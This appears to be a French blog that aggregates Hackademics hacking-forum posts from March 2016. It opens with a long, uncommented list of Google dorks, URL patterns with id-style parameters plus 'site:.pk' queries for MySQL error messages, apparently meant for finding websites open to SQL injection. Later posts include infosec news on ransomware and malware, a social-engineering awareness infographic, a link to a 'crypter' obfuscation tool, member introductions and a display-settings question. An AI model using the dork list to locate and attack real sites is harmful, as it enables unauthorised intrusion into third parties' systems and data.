jeudi 31 mars 2016

Dorks list 2016 - Liste de dorks

.php?cid=
?action=
?cat=
?id=
?page=
?pagerequested=
?pid=
Book.php?bookID=
BookDetails.php?ID=
Browse_Item_Details.php?Store_Id=
Category.php?cid=
Computer Science.php?id=
FernandFaerie/index.php?c=
FullStory.php?Id=
GetItems.php?itemid=
HistoryStore/pages/item.php?itemID=
Interior/productlist.php?id=
KM/BOARD/readboard.php?id=
List.php?CatID=
More_Details.php?id=
OrderForm.php?Cart=
Pages/whichArticle.php?id=
ProductList.php?id=
Sales/view_item.php?id=
Select_Item.php?id=
Services.php?ID=
Shop/home.php?cat=
ShopSearch.php?CategoryID=
StoreRedirect.php?ID=
Store_ViewProducts.php?Cat=
ViewProduct.php?misc=
WsAncillary.php?ID=
WsPages.php?ID=noticiasDetalle.php?xid=
YZboard/view.php?id=
_news/news.php?id=
about.php?cartID=
about_us.php?id=
aboutchiangmai/details.php?id=
abroad/page.php?cid=
accinfo.php?cartId=
acclogin.php?cartID=
add-to-cart.php?ID=
add.php?bookid=
addItem.php
addToCart.php?idProduct=
add_cart.php?num=
addcart.php?
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate-agreement.cfm?storeid=
affiliate.php?ID=
affiliates.php?id=
aktuelles/meldungen-detail.php?id=
aktuelles/veranstaltungen/detail.php?id=
ancillary.php?ID=
answer/default.php?pollID=
archive.php?id=
archive/get.php?message_id=
art.php?id=
article.php?id=
article_preview.php?id=
articlecategory.php?id=
articles.php?id=
artist_art.php?id=
auction/item.php?id=
authorDetails.php?bookID=
basket.php?id=
bayer/dtnews.php?id=
bbs/bbsView.php?id=
bbs/view.php?no=
beitrag_D.php?id=
beitrag_F.php?id=
bid/topic.php?TopicID=
blog.php?blog=
blog/index.php?idBlog=
blog_detail.php?id=
board/board.html?table=
board/kboard.php?board=
board/read.php?tid=
board/showthread.php?t=
board/view.php?no=
board/view_temp.php?table=
boardView.php?bbs=
board_view.html?id=
board_view.php?s_board_id=
book.html?isbn=
book.php?ID=
book.php?ISBN=
book.php?id=
book.php?isbn=
book/bookcover.php?bookid=
bookDetails.php?id=
book_detail.php?BookID=
book_list.php?bookid=
book_view.php?bookid=
bookmark/mybook/bookmark.php?bookPageNo=
bookpage.php?id=
books.php?id=
books/book.php?proj_nr=
bookview.php?id=
bpac/calendar/event.php?id=
brand.php?id=
browse.php?catid=
browse/book.php?journalID=
browse_item_details.php
browsepr.php?pr=
buy.php?
buy.php?bookid=
bycategory.php?id=
calendar/event.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart/addToCart.php?cid=
cart/product.php?productid=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?cat_id=
cat.php?iCat=
cat/?catid=
catalog.php
catalog.php?CatalogID=
catalog/main.php?cat_id=
catalog/product.php?cat_id=
catalog/product.php?pid=
catalog_item.php?ID=
catalog_main.php?catid=
categories.php?cat=
category.php
category.php?CID=
category.php?c=
category.php?catid=
category.php?cid=
category.php?id=
category.php?id_category=
category_list.php?id=
categorydisplay.php?catid=
cats.php?cat=
cbmer/congres/page.php?LAN=
cei/cedb/projdetail.php?projID=
cemetery.php?id=
channel/channel-layout.php?objId=
checkout.php?UserID=
checkout.php?cartid=
checkout1.php?cartid=
checkout_confirmed.php?order_id=
clan_page.php?cid=
classifieds/detail.php?siteid=
classifieds/showproduct.php?product=
cloudbank/detail.php?ID=
club.php?cid=
colourpointeducational/more_details.php?id=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments.php?id=
comments_form.php?ID=
community/calendar-event-fr.php?id=
constructies/product.php?id=
contact.php?cartId=
content.php?ID=
content.php?PID=
content.php?arti_id=
content.php?cID=
content.php?categoryId=
content.php?cid=
content.php?cont_title=
content.php?id
content.php?id=
content.php?p=
content/conference_register.php?ID=
content/detail.php?id=
content/index.php?id=
content/pages/index.php?id_cat=
content/programme.php?ID=
content/view.php?id=
corporate/newsreleases_more.php?id=
county-facts/diary/vcsgen.php?id=
cps/rde/xchg/tm/http://ift.tt/RduXjY
cryolab/content.php?cid=
csc/news-details.php?cat=
customer/board.htm?mode=
customer/home.php?cat=
customerService.php?****ID1=
db/CART/product_details.php?product_id=
de/content.php?page_id=
deal_coupon.php?cat_id=
debate-detail.php?id=
default.php?TID=
default.php?cPath=
default.php?catID=
description.php?bookid=
designcenter/item.php?id=
detail.php?ID=
detail.php?id=
detail.php?item_id=
detail.php?prodID=
detail.php?prodid=
detail.php?siteid=
detailedbook.php?isbn=
details.php?BookID=
details.php?Press_Release_ID=
details.php?ProdID=
details.php?Product_ID=
details.php?Service_ID=
details.php?id=
details.php?prodID=
details.php?prodId=
directory/contenu.php?id_cat=
discussions/10/9/?CategoryID=
display.php?ID=
displayArticleB.php?id=
display_item.php?id=
display_page.php?id=
displayproducts.php
displayrange.php?rangeid=
docDetail.aspx?chnum=
download.php?id=
downloadTrial.php?intProdID=
downloads.php?id=
downloads/category.php?c=
downloads/shambler.php?id=
e_board/modifyform.html?code=
edatabase/home.php?cat=
edition.php?area_id=
education/content.php?page=
els_/product/product.php?id=
emailToFriend.php?idProduct=
emailproduct.php?itemid=
en/main.php?id=
en/news/fullnews.php?newsid=
en/publications.php?id=
eng/rgboard/view.php?&bbs_id=
eng_board/view.php?T****=
english/board/view****.php?code=
english/fonction/print.php?id=
english/print.php?id=
english/publicproducts.php?groupid=
event.php?id=
event_details.php?id=
event_info.php?p=
events.php?ID=
events/detail.php?ID=
events/event.php?ID=
events/event.php?id=
events/event_detail.php?id=
events/index.php?id=
events/unique_event.php?ID=
events?id=
exhibition_overview.php?id=
exhibitions/detail.php?id=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
fatcat/home.php?view=
feature.php?id=
features/view.php?id=
feedback.php?title=
filemanager.php?delete=
forum/profile.php?id=
forum/showProfile.php?id=
fr/commande-liste-categorie.php?panier=
free_board/board_view.html?page=
freedownload.php?bookid=
front/bin/forumview.phtml?bbcode=
frontend/category.php?id_category=
fshstatistic/index.php?PID=
fullDisplay.php?item=
galerie.php?cid=
gallery.php?id=
gallery/detail.php?ID=
gallery/gallery.php?id=
gallerysort.php?iid=
garden_equipment/Fruit-Cage/product.php?pr=
garden_equipment/pest-weed-control/product.php?pr=
gb/comment.php?gb_id=
general.php?id=
getbook.php?bookid=
giftDetail.php?id=
gig.php?id=
global/product/product.php?gubun=
global_projects.php?cid=
gnu/?doc=
goboard/front/board_view.php?code=
goods_detail.php?data=
help.php?CartId=
help/com_view.html?code=
hm/inside.php?id=
home.php?ID=
home.php?cat=
home.php?id=
html/print.php?sid=
html/scoutnew.php?prodid=
htmlpage.php?id=
i-know/content.php?page=
ibp.php?ISBN=
idlechat/message.php?id=
http://ift.tt/1i37tbs
index.php?ID=
index.php?action=
index.php?area_id=
index.php?book=
index.php?cPath=
index.php?cart=
index.php?cartID=
index.php?cat=
index.php?cid=
index.php?cont=
index.php?i=
index.php?id=
index.php?lang=
index.php?modus=
index.php?news=
index.php?offs=
index.php?option=
index.php?page=
index.php?pageId=
index.php?pageid=
index.php?pagina=
index.php?pg_t=
index.php?pid=
index.php?section=
index.php?site=
index.php?t=
index.php?url=
index.php?w=
index_en.php?id=
index_en.php?ref=
info.php?ID=
irbeautina/product_detail.php?product_id=
item.php?eid=
item.php?id=
item.php?iid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item.php?sub_id=
item/detail.php?num=
itemDesc.php?CartId=
item_book.php?CAT=
item_details.php?catid=
item_list.php?cat_id=
item_list.php?maingroup
item_show.php?code_no=
item_show.php?id=
item_show.php?lid=
itemdetail.php?item=
itemdetails.php?catalogid=
kboard/kboard.php?board=
knowledge_base/detail.php?id=
kshop/product.php?productid=
learnmore.php?cartID=
library.php?cat=
links.php?catid=
list.php?bookid=
listcategoriesandproducts.php?idCategory=
listing.php?cat=
lmsrecords_cd.php?cdid=
ls.php?id=
m_view.php?ps_db=
magazin.php?cid=
magazine-details.php?magid=
magazines/adult_magazine_full_year.php?magid=
magazines/adult_magazine_single_page.php?magid=
main.php?id=
main.php?item=
main.php?prodID=
main/index.php?action=
main/index.php?uid=
main/magpreview.php?id=
mall/more.php?ProdID=
mb_showtopic.php?topic_id=
mboard/replies.php?parent_id=
media/pr.php?id=
melbourne_details.php?id=
message/comment_threads.php?postID=
modline.php?id=
module/range/dutch_windmill_collection.php?rangeId=
modules.php?****=
modules.php?bookid=
modules/content/index.php?id=
modules/forum/index.php?topic_id=
more_detail.php?X_EID=
more_detail.php?id=
more_details.php?id=
myaccount.php?catid=
n_replyboard.php?typeboard=
naboard/memo.php?bd=
news.php?ID=
news.php?id=
news.php?t=
news.php?type=
news/detail.php?id=
news/latest_news.php?cat_id=
news/news.php?id=
news/news/title_show.php?id=
news/newsitem.php?newsID=
news/newsletter.php?id=
news/shownewsarticle.php?articleid=
news/temp.php?id=
newsItem.php?newsId=
news_and_notices.php?news_id=
news_content.php?CategoryID=
news_item.php?id=
newsite/pdf_show.php?id=
newsitem.php?newsID=
newsitem.php?newsid=
notify/notify_form.php?topic_id=
nyheder.htm?show=
obio/detail.php?id=
ogloszenia/rss.php?cat=
onlinesales/product.php?product_id=
order.asp?lotid=
order.php?BookID=
order.php?id=
order.php?item_ID=
ourblog.php?categoryid=
ov_tv.php?item=
packages_display.php?ref=
page.php?PartID=
page.php?area_id=
page.php?id=
page.php?modul=
page.php?module=
page.php?pId=
page/de/produkte/produkte.php?prodID=
page/venue.php?id=
pages.php?ID=
pages.php?id=
pages/print.php?id=
pages/video.php?id=
past-event.php?id=
payment.php?CartID=
pdetail.php?item_id=
pdf_post.php?ID=
pharmaxim/category.php?cid=
photogallery.php?id=
php/event.php?id=
php/fid8E1BED06B1301BAE3ED64383D5F619E3B1997A70.aspx?s=
php/fid985C124FBD9EF3A29BA8F40521F12D097B0E2016.aspx?s=
php/index.php?id=
phpx?PageID
picgallery/category.php?cid=
podcast/item.php?pid=
poem_list.php?bookID=
ponuky/item_show.php?ID=
portafolio/portafolio.php?id=
powersearch.php?CartId=
press_release.php?id=
prev_results.php?prodID=
price.php
print-story.php?id=
print.php?ID=
print.php?id=
print.php?sid=
printcards.php?ID=
privacy.php?cartID=
prod.php?cat=
prodView.php?idProduct=
prodbycat.php?intCatalogID=
proddetails_print.php?prodid=
prodetails.php?prodid=
prodlist.php?catid=
prodotti.php?id_cat=
product-list.php?category_id=
product-list.php?cid=
product-list.php?id=
product-range.php?rangeID=
product.php?****=
product.php?ItemID=
product.php?ItemId=
product.php?ProductID=
product.php?bid=
product.php?bookID=
product.php?cat=
product.php?id=
product.php?id_h=
product.php?intProdID=
product.php?intProductID=
product.php?pid=
product.php?prd=
product.php?prodid=
product.php?product=
product.php?product_id=
product.php?productid=
product.php?shopprodid=
product.php?sku=
product/detail.php?id=
product/list.php?pid=
product/product.php?cate=
product/product.php?product_no=
productDetails.php?idProduct=
productDisplay.php
productList.php?cat=
productList.php?id=
product_detail.php?product_id=
product_details.php?id=
product_details.php?prodid=
product_details.php?product_id=
product_info.php?id=
product_info.php?item_id=
product_info.php?products_id=
product_ranges_view.php?ID=
productinfo.php?item=
productlist.php?ViewType=Category&CategoryID=
productlist.php?fid=
productlist.php?grpid=
productlist.php?id=
productlist.php?tid=
productpage.php
products-display-details.php?prodid=
products.php?DepartmentID=
products.php?ID=
products.php?act=
products.php?cat=
products.php?cat_id=
products.php?categoryID=
products.php?catid=
products.php?groupid=
products.php?keyword=
products.php?openparent=
products.php?p=
products.php?rub=
products.php?type=
products/?catID=
products/Blitzball.htm?id=
products/card.php?prodID=
products/index.php?rangeid=
products/parts/detail.php?id=
products/product-list.php?id=
products/product.php?id=
products/product.php?pid=
products/products.php?p=
productsByCategory.php?intCatalogID=
products_category.php?CategoryID=
products_detail.php?CategoryID=
productsview.php?proid=
profile.php?id=
profile_print.php?id=
profiles/profile.php?profileid=
projdetails.php?id=
projects/event.php?id=
promo.php?id=
promotion.php?catid=
properties.php?id_cat=
property.php?id=
psychology/people/detail.php?id=
pub/pds/pds_view.php?start=
publications.php?ID=
publications.php?Id=
publications.php?id=
publications/book_reviews/full_review.php?id=
publications/publication.php?id=
publications/view.php?id=
purelydiamond/products/category.php?cat=
pview.php?Item=
pylones/item.php?item=
questions.php?questionid=
rating.php?id=
rating/stat.php?id=
recipe/category.php?cid=
redaktion/whiteteeth/detail.php?nr=
referral/detail.php?siteid=
releases_headlines_details.php?id=
remixer.php?id=
reply.php?id=
resellers.php?idCategory=
resources/detail.php?id=
resources/index.php?cat=
resources/vulnerabilities_list.php?id=
results.php?cat=
review/review_form.php?item_id=
reviews.php?id=
rounds-detail.php?id=
rss.php?cat=
rss/event.php?id=
rtfe.php?siteid=
s.php?w=
savecart.php?CartId=
schule/termine.php?view=
search.php?CartID=
search/display.php?BookID=
searchcat.php?search_id=
section.php?section=
shippinginfo.php?CartId=
shop.php?a=
shop.php?action=
shop.php?bookid=
shop.php?cartID=
shop/books_detail.php?bookID=
shop/category.php?cat_id=
shop/eventshop/product_detail.php?itemid=
shop/home.php?cat=
shop/index.php?cPath=
shop_details.php?prodid=
shop_display_products.php?cat_id=
shopaddtocart.php
shopaddtocart.php?catalogid=
shopbasket.php?bookid=
shopbycategory.php?catid=
shopcafe-shop-product.php?bookId=
shopcart.php?title=
shopcreatorder.php
shopcurrency.php?cid=
shopdc.php?bookid=
shopdisplaycategories.php
shopdisplayproduct.php?catalogid=
shopdisplayproducts.php
shopexd.php
shopexd.php?catalogid=
shopping_basket.php?cartID=
shopprojectlogin.php
shopquery.php?catalogid=
shopremoveitem.php?cartid=
shopreviewadd.php?id=
shopreviewlist.php?id=
shoptellafriend.php?id=
shopthanks.php
shopwelcome.php?title=
show-book.php?id=
show.php?id=
showStore.php?catID=
show_bug.cgi?id=
show_item.php?id=
show_item_details.php?item_id=
showbook.php?bookid=
showfeature.php?id=
showproduct.php?cat=
showproduct.php?prodid=
showproduct.php?productId=
showsub.php?id=
shprodde.php?SKU=
sinformer/n/imprimer.php?id=
singer/detail.php?siteid=
site.php?id=
site/?details&prodid=
site/en/list_service.php?cat=
site/products.php?prodid=
site:.pk intext:Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in & “id”
site:.pk intext:Warning: mysql_free_result(): supplied argument is not a valid MySQL result resource in & “id”
sitio/item.php?idcd=
skunkworks/content.php?id=
socsci/events/full_details.php?id=
socsci/news_items/full_story.php?id=
software_categories.php?cat_id=
specials.php?id=
specials.php?osCsid=
sport.php?revista=
staff/publications.php?sn=
stat.php?id=
static.php?id=
stockists_list.php?area_id=
store-details.php?id=
store.php?cat_id=
store.php?id=
store/default.php?cPath=
store/description.php?iddesc=
store/home.php?cat=
store/index.php?cat_id=
store/product.php?productid=
store/view_items.php?id=
store_bycat.php?id=
store_listing.php?id=
storefront.php?id=
storefronts.php?title=
storeitem.php?item=
storemanager/contents/item.php?page_code=
story.php?id=
subcategories.php?id=
summary.php?PID=
tas/event.php?id=
tecdaten/showdetail.php?prodid=
tek9.php?
template.php?Action=Item&pid=
templet.php?acticle_id=
things-to-do/detail.php?id=
today.php?eventid=
tools/print.php?id=
topic.php?ID=
toynbeestudios/content.php?id=
trailer.php?id=
tuangou.php?bookid=
type.php?iType=
updatebasket.php?bookid=
updates.php?ID=
usb/devices/showdev.php?id=
veranstaltungen/detail.php?id=
video.php?id=
view-event.php?id=
view.php?cid=
view.php?id=
view.php?pageNum_rscomp=
view/7/9628/1.html?reply=
viewCart.php?userID=
viewCat_h.php?idCategory=
viewPrd.php?idcategory=
view_author.php?id=
view_cart.php?title=
view_detail.php?ID=
view_item.php?id=
view_item.php?item=
view_items.php?id=
view_newsletter.php?id=
viewapp.php?id=
viewcart.php?CartId=
viewevent.php?EventID=
viewitem.php?recor=
viewthread.php?tid=
voteList.php?item_ID=
whatsnew.php?idCategory=
wiki/pmwiki.php?page****=
www/index.php?page=
yacht_search/yacht_view.php?pid=
zb/view.php?uid=
zine/board.php?board=


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1ZNcx7H
via IFTTT

lundi 28 mars 2016

News L'actualité infosec de la semaine - 1er numéro (21 au 28 mars)

L'actualité infosec de la semaine - 1er numéro (21 au 28 mars)




Locky - Le nouveau ransomware qui inonde le net

Locky est un ransomware, un logiciel malveillant qui se propage grâce à des emails piégés. le but de ce logiciel est de crypter vos données, afin de vous demander une rançon en échange. Locky fait fureur en ce moment, et de notamment car il touche les entreprises, qui sont bien souvent obligées de passer à la caisse.


Votre Android rooté à votre insu !
Une faille d'envergure à été trouvée Zimperium sur le Play Store. En effet cette faille permet à plusieurs applications de rooter votre appareil sans que vous soyez au courant. Ainsi, plusieurs applications malveillantes peuvent accéder à des fonctions avancées, et vous voler vos données personnelles.


Raspberry Pi 3: Quelles sont les nouveautés ?
Les Raspberry Pi sont des nano-ordinateurs vendus à un cout excessivement bas, afin d'encourager la programmation chez les enfants et dans les pays en développement. Le 3emes modèle de ces machines est sortit cette semaine. Pas mal d'amélioration et de nouveautés au rendez -vous...


KeRanger un crypto-ransomware pour Mac
Les ransomwares sont en vogue en ce moment. En effet, KeRanger est l'un d'entre eux, mais il se différencie des ses semblables par plusieurs points. En effet, sa méthode de diffusion est pour le moins original, et ce virus ne cible ques les Macs.


Tor : Le gouvernement recommande aux entreprises le blocage via proxy

Le CERT-FR prévient les entreprises et établissements liés à l'enseignements des risques liés au réseau Tor.
En effet, si ce réseau a pour but louable de protéger la vie privée de ces utilisateurs, il permet également d'accéder
à du contenu illégal et potentiellement dangereux pour la vie de l'entreprise.
De plus, Tor est également utilisé pour faire circuler les traffics réseaux illégaux entre les malwares et leurs serveur de gestion.
Les recommandations sont donc de bloquer Tor via un proxy ou un parefeu.
Soit en bloquant les ips des noeuds tors ou les ports qu'ils utilisent

Source : http://ift.tt/1RBQpd6

AceDeceiver : Nouvelle alerte malware iOS. iPhones non jailbreakés à risques
Généralement, les appareils iOS sont moins exposés que les Androids.
De plus, ce sont plus spécifiquement les appareils jailbreakés qui sont ciblés en effet, Apple peut réduire la menace subie par ses appareils grâce au contrôle que la société à son market d'applications.

Cependant, le malware AceDeceiver a réussi à exploiter une faille dans les DRM FairPlay d'Apple afin de mettre en place une attaque en man-in-the-middle permettant l'installation d'applications non vérifiées (et dont peut être malicieuses) sur des appareils iOS non jailbreakés.

Actuellement, le malware cible les iPhone chinois se synchronisant sur une bibliothèque iTunes sur Windows. Il pourrait cependant étendre son champs d'action aux appareils européens et ouvrir la voie de nouvelles voies d'infections d'iOS.

Vous ne savez pas ce que sont les DRM FairPlay ?
C'est par ici : http://ift.tt/1pVw4GV

Source : http://ift.tt/1pVw5uB

Piratage des forums litecointalk
Les crypto-monnaies sont une cibles de choix (car très rentable) pour les cybercriminels et si c'est en général le BitCoin qui est pris pour cible. On voit aujourd'hui qu'il n'est pas le seul.

En effet, le 12 mars, la crypto-monnaie litecoin a été prise pour cible.
Le site web n'est à cette heure pas encore revenu en ligne et les administrateurs de peuvent dire si l'attaquant a pu prendre possession de la base de données.

De ce fait, et même si les mots de passe étaient hashés dans la base de données, les administrateurs conseillent fortement aux utilisateurs ayant utilisé leur mot de passe litecoin sur d'autres services de changer ce dernier.
Une utilisateur prévenu en vaut deux.

Source : http://ift.tt/1pVw5KQ

Le FBI examine une nouvelle façon de craquer l'iPhone sans l'aide d'Apple
Syed Rizwan Farook est l'homme qui le 2 décembre dernier a perpétré une attaque terroriste à SanBernardino en Californie.
Après l'attaque, le FBI a récupéré l'iPhone de l'homme et a sommé Apple de lui donner une technique permettant de contourner la sécurité de l'iPhone effaçant les données de ce dernier quand un trop grand nombre de mot de passe erronés étaient entrés.

La société américaine ayant refusé (pour d'évidente question de sécurité), une tierce partie aurait proposé une telle technique au FBI.
Technique que le FBI serait en ce moment même occupé à vérifier.

Source : http://ift.tt/1pVw5KW

Les nouvelles versions de KDE et Gnome enfin disponible !
Les bonnes nouvelles s'enchainent pour les Linuxiens cette semaine. En effet la nouvelle version de KDE Plasma 5.6 vient de sortir. Au programme ? Des nouvelles couleurs pour le thème Breeze, le lanceur KRunner avec un nouveau design qui supporte les glisser-déposer, le gestionnaire de tache beaucoup plus complet, qui affiche désormais les progression (téléchargement, copie de fichier...etc.), des accès plus rapide pour les applications musicales...
Mais ce n'est pas tout, une nouvelle version de Gnome 3.20 nommé Delhi est également sorti. Ici aussi, pas mal de nouveautés. Des nouvelles applications, l'arrivé de Gnome Photo et d'un gestionnaire de paquets, la possibilité de mettre des applications en sandbox, des raccourcis claviers, et un tas d'autres choses.

Pour aller plus loin:

Source: korben

PowerSniff : Le malware qui ne laisse aucune trace
Palo Alto Networks, une entreprise américaine spécialisée dans les télécommunications viens de trouver un nouveau malware de type PowerShell, capable de s’exécuter directement en mémoire, en ne laissant quasiment aucune trace sur le système infecté. Baptisé PowerSniff par l'équipe de chercheur, le malware se propage par une méthode bien connue: les e-mails contenant une pièce jointe piégée. Dans un billet de blog, les chercheurs de Palo Alto Networks décrivent un fonctionnement typique pour ce type de e-menace : une fois le document joint ouvert, une macro malicieuse s’exécute et invoque le service WMI pour lancer une instance cachée de powershell.exe avec des arguments déclenchant le téléchargement d’un script PowerShell encodé, qui est alors directement déchiffré et exécuté.

Source: undernews


By Anonyme77, _47 & Bioshock


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1RBQlKB
via IFTTT

samedi 26 mars 2016

News Raspberry Pi 3: Quelles sont les nouveautés ?



Le Raspberry Pi est un nano ordinateur destiné à encourager l'apprentissage de l'informatique et du développement aux enfants, ou encore de faciliter l’accès à l'informatique dans les pays en cours de développement, et ce notamment grâce à son prix plus qu'abordable: 35€. L'usage de cette puce à aujourd'hui un peu dérivé en effet, car elle est utilisé par plein de bidouilleur en herbe, pour s'initier à pas mal de petits projets plus ou moins utiles, mais tous très amusant.

Aujourd'hui en tout cas, grande révolution dans le monde de la framboise puisque le nouveau modèle du Raspberry Pi (le 3) viens de sortir !



Au niveau des améliorations notables, on pourra noter l'arrivée du Wi-Fi et du Bluetooth, une meilleur gestion de la puissance, ce qui va permettre de connecter des périphériques USB plus gourmand, et enfin, un processeur en 64bits, ce qui veut dire une nouvelle version de Raspbian...

Les caractéristiques:

-Processeur ARMv7 Broadcom BCM2837 – 4 Cœurs – 64 bits
-Fréquence d’horloge de 1.2Ghz (+33% par rapport au Pi 2)
-Port Ethernet 10/100
-1GB RAM (toujours)
-WiFi intégré à la carte 802.11 b/g/n (BCM43438)
-Bluetooth Low Energy intégré à la carte (BCM43438)
-HDMI 1.3a
-Une alimentation de 2.5 Ampères est vivement conseillée pour ce modèle



Source:framboise314


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1q7yFND
via IFTTT

KeRanger un crypto-ransomware pour Mac


2016 se présente d'ors et déjà comme étant l'année du ransomware.
C'est dans cette perspective se présente ‘KeRanger, l'un des premiers crypto - ransonware pour Mac.

Qu'est ce qu'un crypto-ransomware
Un crypto-ransomware est un type de malware dont le but est de crypter vos données personnelles (elles sont donc rendues inutilisables) et de vous faire miroiter un décryptage contre rançon.
C'est une prise en otage de vos données personnelles.

Si le principe n'est pas nouveau (le premier exemple date des années 80), il a récemment repris de l'ampleur avec les nouvelles techniques des cyber criminels servant à gagner de l'argent grâce à ce type de malware.

Sous bien des aspects, ‘KeRanger’ est un crypto-ransware comme les autres.
Il crypte vos données et vous fait une demande de rançon pour vous les récupérer.
Cependant ‘KeRanger’ est différent.

En quoi se démarque t'il ?
  1. ‘KeRanger’ est le premier crypto-ransomware qui cible les Apple sous OSX.
  2. Il se répend en diffusant une version piratée du logiciel de torrent Transmission. Cette version bien que piratée semble cependant légitime car les pirates ont réussi a utiliser la clef de signature d'un développeur identifié par Apple. De plus, le tunnel réseau utilisé pour la communication entre le pirate et le malware est très sécurisé et passe par des réseaux anonymes qu'il est très compliqué de remonter.
  3. ‘KeRanger’ est un portage d'une ransomware construit pour Linux.


Comment s'en protéger ?
  1. Réalisez que votre Mac n'est pas immunisé contre les virus
  2. Faites des backups de vos données : Attention, le malware est également capable de chiffrer vos sauvegardes time machine
  3. Ne cliquez pas n'importe où, soyez prudents
  4. Ne payez surtout pas. Rien ne vous dit que le pirate vous donnera la clef de déchiffrement. De plus, payer c'est donné du crédit à l'acte et montrer que cette entreprise peut en effet rapporter.


Vous souhaitez plus d'informations, c'est par là :
http://researchcenter.paloaltonetwor...ent-installer/

Source :
http://ift.tt/1od4umL


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1q7yCSd
via IFTTT

Votre Android rooté à votre insu !


Un nouvel exploit a été découvert dans le noyau Linux utilisé par Android.

Cette faille permet a une application de rooter votre téléphone à votre insu.
L'application peut alors exploiter des fonctionnalités qui nécessitent que le téléphone soit rooté.
Elle permettrait donc à une personne mal intentionnée de prendre le contrôle de votre téléphone et de voler vos informations personnelles.

La faille a été dévoilée par Zimperium.
Google a alors localisé sur le PlayStore les applications utilisant cette faille.
Celles si sont actuellement en phase d'être supprimées du PlayStore.

Google en a profité pour mettre à jour sa fonctionnalité de vérification des applications avant la publication sur le Store.
La société américaine conseille également à tous les utilisateurs d'appliquer le patch qui devrait sortir sous peu.

Les versions touchées sont les Android utilisant des noyaux 3.4, 3.10 ou encore 3.14, y compris sur les Nexus. La version 3.18 ou supérieure n’est quant à elle pas vulnérable.

Source
http://ift.tt/1od4umH


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1q7yCS6
via IFTTT

vendredi 25 mars 2016

News Quelques techniques de Social Engineering


Le Social Engineering (ingénierie sociale) est une méthode utilisée par les hackers pour obtenir des informations sur une personne sans qu'elle ne se rende compte de rien, pour parvenir à ses fin. En effet, il est plus facile de demander le mot de passe directement à une victime, plutôt que de mettre plusieurs heures à le cracker. Le Social Engineering peut prendre plusieurs formes: Par téléphone, par mail, et même par contact humain.

Un bon hacker aura au préalable préparer son personnage, il vous donnera des détails très précis avec beaucoup d'information, rendant la supercherie très difficile à déceler. C'est pourquoi je vous présente aujourd'hui une infographie réaliser par Smartfile, qui vous aide à mieux reconnaitre et à mieux se protéger de ce genre d'attaque.

[/URL]

Source: lifehacker


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1WNggQS
via IFTTT

lundi 21 mars 2016

Joyeux printemps 2016 !

Je me présente : Davinci
Je possède une bonne connaissance des OS et du matériel Apple
J'aime améliorer et détourner des objets et des logiciels de leur utilisation initiale (oui, c'est du hacking !)
Système d'exploitation principal : OS X d'Apple.
Je viens sur ce forum pour me divertir, partager mes quelques connaissances et tenter d'en acquérir d'autres.
J'ai connu ce forum par Google en recherchant des sujets sur la cryptographie.
Je suis retraité de l'électronique, fan d'informatique et de photographie.
En ce moment, je travaille sur un logiciel de chiffrement capable de résister au FBI et à la NSA :rolleyes:
Merci de m'accueillir parmis vous !


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/25fwyrs
via IFTTT

Système de chiffrement sans transmission de clef secrète

Bonjour,
J'ai développé un système de chiffrement à clef secrète ne nécessitant pas de transmettre la clef au destinataire bien que celle-ci fasse plus de 800000 bits.
Cette clef est fabriquée par les protagonistes à partir d'éléments matériels simples tels que des disques vidéo de films commerciaux.
Le chiffrement d'un document d'une taille d'1Go est réalisé en moins de 50sec.
Ce procédé est inédit ainsi que l'algorythme de chiffrement.
Ecrit en grande partie sous UNIX, il ne fonctionne que sur l'Os d' Apple (de Leopard à El Capitan).
Si vous êtes intéressés par ce système, je vous donnerai des détails, notamment le programme par lui-même ainsi que le principe de la clef.
Merci de votre attention.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1XGJyRa
via IFTTT

Hacke coucou

Bonjour à tous,
Pseudo (+autres si plusieurs) :Lemouetton
Connaissances informatiques générales :Je me débrouille surtout sous windows XP et seven
Connaissances en hacking :Quasi nulle
Système d'exploitation principal :Seven
Je viens sur ce forum pour :apprendre et échanger
J'ai connu ce forum via :lafouinedunet
Informations supplémentaires (job, intérêts, autres...) :73 printemps et il me manque 2 dents, j'aime : ma femme,le sport, la mycologie, le bricolage, l'informatique et plein d'autres choses. Je déteste: les cons, l'intolérance, l'oignon cru.


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/22y6Iwo
via IFTTT

dimanche 20 mars 2016

Tutoriel [TUTO] Crypter

Bonjour,
Je vous présente aujord'hui un crypter sur lequel je travail depuis bientot 2 semaines

Voici le lien: http://ift.tt/25djN0B

Bonne journée :)


from Hackademics : Forum de hacking – hackers white hat – cours de securite informatique, apprendre langage python, tutoriels de reverse engineering http://ift.tt/1WAknzq
via IFTTT

Rafraichissement écran

Bonjour, suite a un passage de windows 10 à debian 8, j'ai un problème de rafraichissement de ma dalle (j'avais le même problème sous windows mais sous windows je savais résoudre le problème), ma dalle "fonctionne" sous 40Hz et non 60Hz, ce qui fait que la mon affichage et très moche. J'ai essayé de résoudre le problème en utilisant xrandr mais le problème n'est pas résolu. Donc je viens demander de l'aide. Pouvez-vous m'aider ?

J'ai deux cartes graphiques 1 intel et 1 nvidia

Merci d'avance.
Cordialement Vincauddu29


